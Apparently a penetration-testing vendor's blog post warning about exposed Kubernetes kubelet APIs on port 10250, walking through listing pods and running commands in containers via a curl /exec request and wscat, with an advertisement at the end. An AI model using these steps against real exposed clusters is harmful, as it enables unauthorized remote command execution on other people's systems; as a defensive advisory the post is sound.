Beware of Exposed Kubernetes API

With new technology comes new vulnerabilities. If a developer isn’t careful, they could easily end up exposing the Kubernetes API to the world, allowing remote attackers in.

Alex Thomas

September 9, 2021

Introduction

With the rise of Docker, new technologies are bound to be designed around the concept of containers. Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google.

Exposed Kubernetes API

As convenient as Kubernetes is, it has a drawback. Kubernetes exposes an unauthenticated REST API on port 10250. If developers aren’t careful, this API can be exposed to the Internet. A quick Shodan search will find several of these services:

Once a Kubernetes service is detected, the first thing to do is to get a list of pods by sending a GET request to the /pods endpoint. The server should respond with something like:

{
“kind”: “PodList”,
“apiVersion”: “v1”,
“metadata”: {},
“items”: [
{
“metadata”: {
“name”: “pushgateway-5fc955dd8d-674qn”,
“generateName”: “pushgateway-5fc955dd8d-“,
“namespace”: “monitoring”,
“selfLink”: “/api/v1/namespaces/monitoring/pods/pushgateway-5fc955dd8d-674qn”,
“uid”: “d554e035-b759-11e9-814c-525400bdacd2”,
“resourceVersion”: “9594”,
“creationTimestamp”: “2019-08-05T08:20:07Z”,
“labels”: {
“app”: “pushgateway”,
“pod-template-hash”: “1975118848”,
“prophet.4paradigm.com/deployment”: “pushgateway”
},
“annotations”: {
“kubernetes.io/config.seen”: “2019-08-05T16:20:07.080938229+08:00”,
“kubernetes.io/config.source”: “api”,
“kubernetes.io/created-by”: “{\”kind\”:\”SerializedReference\”,\”apiVersion\”:\”v1\”,\”reference\”:{\”kind\”:\”ReplicaSet\”,\”namespace\”:\”monitoring\”,\”name\”:\”pushgateway-5fc955dd8d\”,\”uid\”:\”d552bfb3-b759-11e9-814c-525400bdacd2\”,\”apiVersion\”:\”extensions\”,\”resourceVersion\”:\”9591\”}}\n”
},
“ownerReferences”: [
{
“apiVersion”: “extensions/v1beta1”,
“kind”: “ReplicaSet”,
“name”: “pushgateway-5fc955dd8d”,
“uid”: “d552bfb3-b759-11e9-814c-525400bdacd2”,
“controller”: true,
“blockOwnerDeletion”: true
}
]
},
“spec”: {
“volumes”: [
{
“name”: “default-token-qgm5l”,
“secret”: {
“secretName”: “default-token-qgm5l”,
“defaultMode”: 420
}
}
],
“containers”: [
{
“name”: “pushgateway”,
“image”: “10.10.0.15:35000/prom/pushgateway:v0.4.1”,
“ports”: [
{
“name”: “http”,
“containerPort”: 9091,
“protocol”: “TCP”
}
]

From the above response, we get namespace names, pod names, and container names:

  • Namespace
    • monitoring
  • Pod Name
    • pushgateway-5fc955dd8d-674qn
  • Container Name
    • pushgateway

With this information, it is possible to send requests to the API service that will execute a provided command. This can be done by sending the follow GET request:

curl –insecure -v -H “X-Stream-Protocol-Version: v2.channel.k8s.io” -H “X-Stream-Protocol-Version: channel.k8s.io” -H “Connection: upgrade” -H “Upgrade: SPDY/3.1” -X POST “https://:/exec///?command=&input=1&output=1&tty=1”

After sending the request, you should receive a response similar to the message below:

As you can see, the above response indicates it was successful and a websocket connect was created. Note the Location Header value; in this response, its value is equal to /cri/exec/Bwak7x7h.

To handle websocket connections, use the tool wscat. This tool can be downloaded by issuing the following command:

apt-get install node-ws

Now take the location header value (which was noted earlier) and send the following requests to get the command output:

wscat -c “https://:/” –no-check

As you can see in the above image, the command “id” was run on the container and the output is displayed. We have successfully executed code on the remote container, RCE is easy.

Conclusion

With new technology comes new vulnerabilities. The rise of Docker containers gave birth to Kubernetes. If a developer isn’t careful, they could easily end up exposing the Kubernetes API to the world. This could allow remote attackers to execute commands on containers unauthenticated.

About Red Sentry

Red Sentry’s continuous external and cloud penetration testing platform allows companies to identify their cyber vulnerabilities 24 hours a day, 365 days a year. The system is automated, agentless, scalable, and easy to use. Pentest reports take minutes rather than weeks and cost a fraction of traditional pentests. To learn more, fill out the form below.

Alex Thomas

CTO, Ethical hacker of numerous Fortune 500 companies. Inventor of cybersecurity tools and published author of two books. Dakota State University BS and MS.


Red Sentry is an enterprise cloud penetration testing, asset tracking and monitoring platform designed to save time, operationalize security, and reduce costs.

+1-678-561-3901

Get in touch with us!

48 HOUR PENTESTS !

Now Available! External, Cloud, Web App, and more!